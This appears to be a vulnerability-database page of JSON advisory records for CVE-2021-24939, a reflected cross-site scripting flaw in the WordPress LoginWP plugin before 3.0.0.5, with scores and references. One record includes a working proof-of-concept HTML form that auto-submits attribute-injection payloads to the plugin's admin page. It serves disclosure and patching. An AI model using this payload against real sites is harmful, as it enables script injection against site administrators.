DATABASE RESOURCES PRICING ABOUT US

{"id": "CNVD-2021-95951", "vendorId": null, "type": "cnvd", "bulletinFamily": "cnvd", "title": "WordPress LoginWP plugin cross-site scripting vulnerability", "description": "WordPress is the WordPress Foundation's suite of blogging platforms developed using the PHP language. The platform supports the hosting of personal blogging sites on servers with PHP and MySQL. WordPress LoginWP plugin has a cross-site scripting vulnerability in versions prior to 3.0.0.5, which stems from a lack of data validation filtering of user-supplied data and output. An attacker could exploit the vulnerability to execute JavaScript code on the client side.", "published": "2021-12-09T00:00:00", "modified": "2021-12-10T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-95951", "reporter": "China National Vulnerability Database", "references": [], "cvelist": ["CVE-2021-24939"], "immutableFields": [], "lastseen": "2022-11-05T07:59:22", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24939"]}, {"type": "patchstack", "idList": ["PATCHSTACK:F492B24FE05DEE1497854B03B608F368"]}, {"type": "wpexploit", "idList": ["WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}]}, "score": {"value": 1.7, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "wordpress loginwp plugin <3.", "version": 0}]}, "epss": [{"cve": "CVE-2021-24939", "epss": "0.000820000", "percentile": "0.333570000", "modified": "2023-03-20"}], "vulnersScore": 1.7}, "_state": {"dependencies": 1678105738, "score": 1684017570, "affected_software_major_version": 0, "epss": 1679345642}, "_internal": {"score_hash": "09b453a0c4b8448667123e23546cda40"}, "vendorCVSS": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "affectedSoftware": [{"name": "WordPress LoginWP plugin <3.", "version": "0.0.5", "operator": "eq"}]}

{"patchstack": [{"lastseen": "2022-06-01T19:28:50", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by JrXnm in WordPress LoginWP plugin (versions <= 3.0.0.4).\n\n## Solution\n\n\r\n Update the WordPress LoginWP plugin to the latest available version (at least 3.0.0.5).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "patchstack", "title": "WordPress LoginWP plugin <= 3.0.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T00:00:00", "id": "PATCHSTACK:F492B24FE05DEE1497854B03B608F368", "href": "https://patchstack.com/database/vulnerability/peters-login-redirect/wordpress-loginwp-plugin-3-0-0-4-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2022-01-17T19:25:27", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue\n\n### PoC\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "wpvulndb", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T07:42:09", "id": "WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "href": "https://wpscan.com/vulnerability/1a46cfec-24ad-4619-8579-f09bbd8ee748", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2022-01-17T19:25:27", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "wpexploit", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T07:42:09", "id": "WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "href": "", "sourceData": "<html>\r\n <body>\r\n <form action=\"https://example.com/wp-admin/admin.php?page=loginwp-redirections&new=1\" id=\"hack\" method=\"POST\">\r\n <input type=\"hidden\" name=\"rul_login_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-login_url/)//' />\r\n <input type=\"hidden\" name=\"rul_logout_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-logout_url/)//' />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n <script>\r\n var form1 = document.getElementById('hack');\r\n form1.submit();\r\n</script>\r\n</html>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-05-27T14:28:31", "description": "The LoginWP (Formerly Peter's Login Redirect) WordPress plugin before 3.0.0.5 does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-06T16:15:00", "type": "cve", "title": "CVE-2021-24939", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-06T21:27:00", "cpe": [], "id": "CVE-2021-24939", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24939", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}]}